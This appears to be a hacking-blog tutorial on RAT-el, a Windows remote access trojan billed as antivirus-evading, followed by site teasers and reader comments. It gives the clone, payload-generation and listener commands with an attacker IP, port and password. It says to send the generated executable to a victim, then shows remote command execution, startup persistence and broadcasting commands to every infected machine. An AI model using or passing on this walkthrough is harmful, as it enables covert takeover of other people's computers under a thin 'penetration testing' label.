Hey Folks, today in this tutorial we are going to tell you about another penetration testing tool called “RAT-el “. RAT-el is an open source penetration test tool that allows you to take control of a windows machine. It works on the client-server model, the server sends commands and the client executes the commands and sends the result back to the server. The client is completely undetectable by anti-virus software.
Let’s take a look 😛 !!
As always this time also we need to install some dependencies before installing this tool.
sudo apt-get install git python3 python3-pip mingw-w64First of all, you have to download the project of this tool by git command from gihtub. After that you need to go to the “setup” directory of this tool using cd command and finally execute the “pip” command to establish the rest of the dependencies.
git clone https://github.com/FrenchCisco/RATel
cd RATel/setup
pip3 install -r requirement.txtWe will have to return to the main directory of this tool. Now you have to change the IP address, port number and name of this tool according to you.
cd RATel
python3 RATelGenerator.py --port 12345 --ip 192.168.1.12 --name ratel.exe --password secnhackAfter the payload is created, the payload will be saved in the “payload” directory. Now you can share it to the victim using any online or offline services.
cd payload/Alright 😛 !! Look at below, windows defender security is enabled.
Go back to your main kali linux machine and set up the server to capture the client session. Now the connection will be established as soon as the victim clicks on the malicious client service.
cd RATel/server
python3 RATelServer.py --port 12345 --password secnhack --time 5 --cleanWe have no idea what exactly we need to do after getting the session, so we will execute the “-h” command to see all the commands.
You can see all established sessions by using the “-ls” command.
Execute the command by simply selecting the target and its session ID. Now we have got complete control of the target system. After that we will execute the “-h” command to see its usage again.
Usage 😛 –target < ID >
Now we can execute all the commands associated with cmd prompt on the target system using the “-c” parameter.
Also you can activate CMD prompt by executing the following command.
The persistence module is loaded during Windows startup which we can also create.
It has another feature by which we can broadcast any message simultaneously to all valid sessions. As you can see in the image below, we have propagated the message of opening the file explorer in each system.
--broadcast
-c "explorer.exe"BOOM 😛 !! As you can see the file explorer prompt is activated in every system which means it works perfectly.
A keen learner and passionate IT student. He has done Web designing, CCNA, RedHat, Ethical hacking, Network & web penetration testing. Currently, he is completing his graduation and learning about Red teaming, CTF challenges & Blue teaming.
Hey Folks :) !! In this article, we present the "Termux Cheat Sheet for Hackers"…
Amid the rapid advancement of technology, the significance of human involvement in cybersecurity frequently goes…
Hey Folks, we are back today after such a long break, but don't worry we…
The security of your API should be one of the top priorities of companies. Without…
Hey Folks, In today's business world, it is essential to have an online presence. However,…
Hey Folks, Is your business prepared in case of a cyber attack? Many companies don't…
This website uses cookies.
View Comments
When creating Rat there is this problem:
Traceback (most recent call last):
File "/home/kali/RATel/RATelGenerator.py", line 9, in
import server.scripts.other as other
File "/home/kali/RATel/server/scripts/other.py", line 4, in
from backports.pbkdf2 import pbkdf2_hmac
ModuleNotFoundError: No module named 'backports'
Any suggestions?
IS DEAD :(
FUCKIN WDAV